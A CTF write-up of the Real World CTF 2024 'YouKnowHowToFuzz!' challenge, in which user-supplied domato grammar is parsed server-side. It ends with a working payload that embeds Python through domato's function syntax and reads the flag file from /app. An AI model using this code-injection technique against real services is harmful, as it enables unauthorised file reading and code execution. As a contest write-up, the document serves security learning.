## Summary

This is a writeup for the "YouKnowHowToFuzz!" challenge at [Real World CTF](https://realworldctf.com/) 2024 that I solved playing for [Kalmarunionen](https://www.kalmarunionen.dk/). In total 57 teams solved this challenge that mostly consisted of looking up the syntax for the [domato](https://github.com/googleprojectzero/domato) DOM fuzzer.

Solution by: shalaamum

Writeup by: shalaamum

## Challenge

We get to provide some lines of input to the remote. That input is then parsed as a grammar using domato, and `_generate_code(10)` is used to generate some lines from it, which we receive back. The following is a shortened version of the challenge script showing this.
```python
# your_rule is read in from us
rwctf_grammar = Grammar()
err = rwctf_grammar.parse_from_string(your_rule)
# [...]
rwctf_result = rwctf_grammar._generate_code(10)
# [...]
print(rwctf_result)
```

The flag is in a file under `/app/`, so we need to leak that file somehow.

## The solution

Skimming the [readme of domato](https://github.com/googleprojectzero/domato) the first example grammar is the following.
```
<cssrule> = <selector> { <declaration> }
<selector> = a
<selector> = b
<declaration> = width:100%
```
Trying this we get an error though. That part of the readme uses the `generate_symbol` function, whereas the challenge uses `_generate_code`.

Scrolling a bit down we find a section "Generating programming language code", which has the word "code" in it, and indeed the example from there does run without error:
```
!varformat fuzzvar%05d
!lineguard try { <line> } catch(e) {}

!begin lines
<new element> = document.getElementById("<string min=97 max=122>");
<element>.doSomething();
!end lines
```
The crucial thing that was missing before is the `!begin lines` and `!end lines`. 

Scrolling further down in the readme, a section title "Including Python code" sounds very promising, which suggests that with
```
!begin function functionname
  # python code
  ret_val = #some return value
!end function
```
we can define Python functions, and call them using `<call function=functionname>`. This ended up providing the solution, as the Python code appears to be run without any sandboxing that would prevent reading the file.
Payload used:
```
!begin lines
!begin function getflag
  import os
  filename = os.listdir('/app')[0]
  path = '/app/' + filename
  fh = open(path, 'r')
  flag = fh.read()
  fh.close()
  ret_val = flag
!end function
<call function=getflag>
!end lines
<EOF>
```
